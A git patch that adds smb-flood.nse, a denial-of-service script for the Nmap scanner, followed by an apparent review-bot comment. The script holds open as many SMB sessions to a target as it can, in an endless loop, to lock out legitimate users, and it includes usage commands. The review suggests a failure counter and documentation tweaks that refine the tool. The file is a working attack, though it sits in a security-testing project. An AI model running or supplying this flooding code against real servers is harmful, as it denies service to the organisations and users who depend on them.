From 3cc225753099b18d7daf631df13e7cf3bbc4252d Mon Sep 17 00:00:00 2001
From: ron
Date: Sun, 3 Oct 2010 23:02:39 +0000
Subject: [PATCH] Added a new smb script: smb-flood.nse.

This denial-of-service script attempts to open too many SMB connections to the server, which can deny legitimate connections from being established.
---
 scripts/smb-flood.nse | 53 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 scripts/smb-flood.nse

diff --git a/scripts/smb-flood.nse b/scripts/smb-flood.nse
new file mode 100644
index 000000000..edd7a8330
--- /dev/null
+++ b/scripts/smb-flood.nse
@@ -0,0 +1,53 @@
+description = [[
+Exhaust the limit of SMB connections on a remote server by opening as many as we can.
+Most implementations of SMB have a hard global limit of 11 connections for user accounts
+and 10 connections for anonymous. Once that limit is exhausted, further connections
+are denied. This exploits that limit by taking up all the connections and holding them.
+
+This works better with a valid user account, because Windows reserves one slot for valid
+users. So, no matter how many anonymous connections are taking up spaces, a single valid
+user can still log in.
+
+This is *not* recommended as a general purpose script, because a) it is designed to harm
+the server and has no useful output, and b) it never ends (until timeout).
+]]
+
+---
+-- @usage
+-- nmap --script smb-flood.nse -p445
+-- sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139
+--
+-- @output
+-- n/a
+-----------------------------------------------------------------------
+
+
+
+author = "Ron Bowes"
+copyright = "Ron Bowes"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"intrusive","dos"}
+dependencies = {"smb-brute"}
+
+require 'smb'
+require 'stdnse'
+
+hostrule = function(host)
+ return smb.get_port(host) ~= nil
+end
+
+action = function(host)
+ local states = {}
+ repeat
+ local status, result = smb.start_ex(host, true, true)
+ if(status) then
+ table.insert(states, result) -- Keep the result so it doesn't get garbage cleaned
+ stdnse.print_debug(1, "smb-flood: Connection successfully opened")
+ stdnse.sleep(.1)
+ else
+ stdnse.print_debug(1, "smb-flood: Connection failed: %s", result)
+ stdnse.sleep(1)
+ end
+ until false
+end
+
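Review bot: The `repeat ... until false` loop in `action` has no exit condition at all, so once the target stops accepting new sessions (the intended outcome) or becomes unreachable, the script keeps calling `smb.start_ex` once per second until the host's script timeout, and nothing in the output distinguishes "limit exhausted" from "host gone". A cheap guard is to count consecutive failures and bail out after a bound: `local failures = 0` before the loop, `failures = failures + 1` in the `else` branch (resetting it to `0` on success), and `until failures >= 30` instead of `until false`; if this Nmap version exposes script arguments through `stdnse`, the bound and a cap on the number of held connections would be better taken from a script argument than hard-coded. The description's per-account connection limits (11/10) are stated as fact but are not something the script verifies, so the doc block should present them as the Windows defaults this was tested against, e.g. `-- NOTE: the 10/11 connection limits are observed Windows defaults, not probed; other servers may behave differently.` Finally, the comment on `table.insert(states, result)` is the only hint that the held SMB state tables are the whole point of the script; a one-line header comment above `action` saying the connections are deliberately never closed with `smb.stop` would save the next reader from "fixing" the apparent leak.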